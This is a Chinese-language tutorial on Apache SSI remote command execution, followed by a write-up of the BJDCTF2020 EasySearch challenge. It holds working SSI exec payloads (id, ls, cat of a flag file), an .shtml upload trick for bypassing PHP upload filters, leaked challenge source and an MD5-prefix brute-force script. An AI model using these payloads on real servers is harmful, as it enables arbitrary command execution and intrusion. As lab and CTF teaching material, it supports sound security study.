Apache SSI 远程命令执行漏洞（SSI注入漏洞）

SSI 服务器端包含

SSI（server-side includes）能帮我们实现什么功能：
SSI提供了一种对现有HTML文档增加动态内容的方法，即在html中加入动态内容。

SSI是嵌入HTML页面中的指令，在页面被提供时由服务器进行运算，以对现有HTML页面增加动态生成的内容，而无须通过CGI程序提供其整个页面，或者使用其他动态技术。

从技术角度上来说，SSI就是在HTML文件中，可以通过注释行调用的命令或指针，即允许通过在HTML页面注入脚本或远程执行任意命令。

在测试任意文件上传漏洞的时候，目标服务端可能不允许上传php后缀的文件。如果目标服务器开启了SSI与CGI支持，我们可以上传一个shtml文件，并利用<!--#exec cmd="ls /" -->语法执行任意命令。

Apache SSI 远程命令执行漏洞

当目标服务器开启了SSI与CGI支持，我们就可以上传shtml，利用<!--#exec cmd="ls /" -->语法来执行命令。

使用SSI(Server Side Include)的html文件扩展名，SSI（Server Side Include)，通常称为"服务器端嵌入"或者叫"服务器端包含"，是一种类似于ASP的基于服务器的网页制作技术。默认扩展名是 .stm、.shtm 和 .shtml。

漏洞环境搭建与复现

1、使用docker搭建漏洞环境，启动环境

docker-compose build

docker-compose up -d

2、浏览器访问http://172.17.0.1:8080/upload.php，即可看到一个上传表单。

3、上传一个php文件，提示不支持的上传的类型

4、上传一个shell.shtml文件，里面写入以下内容：

<!--#exec cmd="id" -->

上传成功。
5、浏览器访问上传的文件，下图可以看到成功执行代码，说明存在远程命令执行漏洞

SSI注入漏洞

SSI注入漏洞的原理和上面那个是一样的。在很多业务中，用户输入的内容会显示在页面中。比如，一个存在反射型XSS漏洞的页面，如果输入的payload不是XSS代码而是SSI的标签，同时服务器又开启了对SSI的支持的话就会存在SSI漏洞。

从定义中看出，页面中有一小部分是动态输出的时候使用SSI，比如：

• 文件相关的属性字段
• 当前时间
• 访客IP
• 调用CGI程序

SSI注入的条件

当符合下列条件时，攻击者可以在 Web 服务器上运行任意命令：

• Web 服务器已支持SSI（服务器端包含）
• Web 应用程序未对相关SSI关键字做过滤
• Web 应用程序在返回响应的HTML页面时，嵌入了用户输入

SSI挖掘思路

两个思路：

• 从业务场景来Fuzz，比如获取IP、定位、时间等
• 识别页面是否包含.stm,.shtm和.shtml后缀

[BJDCTF2020]EasySearch

进入题目，一个登陆页面

本以为是sql注入，但怎么注入都不成功，只能用dirsearch扫一下目录：

得到index.php.swp文件，我们访问它，得到index.php的源码：

<?php
	ob_start();
	function get_hash(){
		$chars = 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789!@#$%^&*()+-';
		$random = $chars[mt_rand(0,73)].$chars[mt_rand(0,73)].$chars[mt_rand(0,73)].$chars[mt_rand(0,73)].$chars[mt_rand(0,73)];//Random 5 times
		$content = uniqid().$random;
		return sha1($content); 
	}
    header("Content-Type: text/html;charset=utf-8");
	***
    if(isset($_POST['username']) and $_POST['username'] != '' )
    {
        $admin = '6d0bc1';
        if ( $admin == substr(md5($_POST['password']),0,6)) {
            echo "<script>alert('[+] Welcome to manage system')</script>";
            $file_shtml = "public/".get_hash().".shtml";
            $shtml = fopen($file_shtml, "w") or die("Unable to open file!");
            $text = '
            ***
            ***
            <h1>Hello,'.$_POST['username'].'</h1>
            ***
			***';
            fwrite($shtml,$text);
            fclose($shtml);
            ***
			echo "[!] Header  error ...";
        } else {
            echo "<script>alert('[!] Failed')</script>";
            
    }else
    {
	***
    }
	***
?>

代码的大体逻辑就是，如果你输入的密码经过MD5加密后，密文的前6位等于6d0bc1就登陆成功，并且为这个用户生成一个唯一的.shtml页面，shtml页面里的内容是你的输入的用户名。我们来试验一下。
首先，要满足密码的条件，写个脚本找到MD5加密后等于6d0bc1的密码：

import hashlib

a= '0123456789'
for o in a:
    for p in a:
        for q in a:
            for r in a:
                for s in a:
                    for t in a:
                        for u in a:
                            b = str(o)+str(p)+str(q)+str(r)+str(s)+str(t)+str(u)
                            md5 = hashlib.md5(b.encode('utf-8')).hexdigest()
                            if ((md5[0:6])=='6d0bc1'):
                                print b

找到了2020666可以。
我们随便输入哥用户名，密码输入2020666：


可是进入页面后就什么也没有了，

咱也找不到生成的.shtml文件在哪。只能抓个包看看：

在响应中找到了.shtml的url，我们访问它：

发现确实输出了你输入的用户名，这不正符合SSI注入的条件吗，我们只需要在刚开始的用户名处输入payload：

<!--#exec cmd="ls ../" -->
<!--#exec cmd="cat /flag" -->
......

这样，将payload输出到了他给你生成的.shtml页面中，不就执行了命令了吗。

开始HACK：
输入：

用户名：<!--#exec cmd="ls ../" -->
密码：2020666

登录后抓包，访问.shtml，成功执行命令：

发现flag_990c66bf85a09c664f0b6741840499b2文件，读取flag_990c66bf85a09c664f0b6741840499b2：

用户名：<!--#exec cmd="cat flag_990c66bf85a09c664f0b6741840499b2" -->
密码：2020666

当然我们直接在url中访问flag_990c66bf85a09c664f0b6741840499b2文件即可：

得到flag。

SSI这种技术已经比较少用了。如果应用没有使用到SSI，关闭服务器对SSI的支持即可。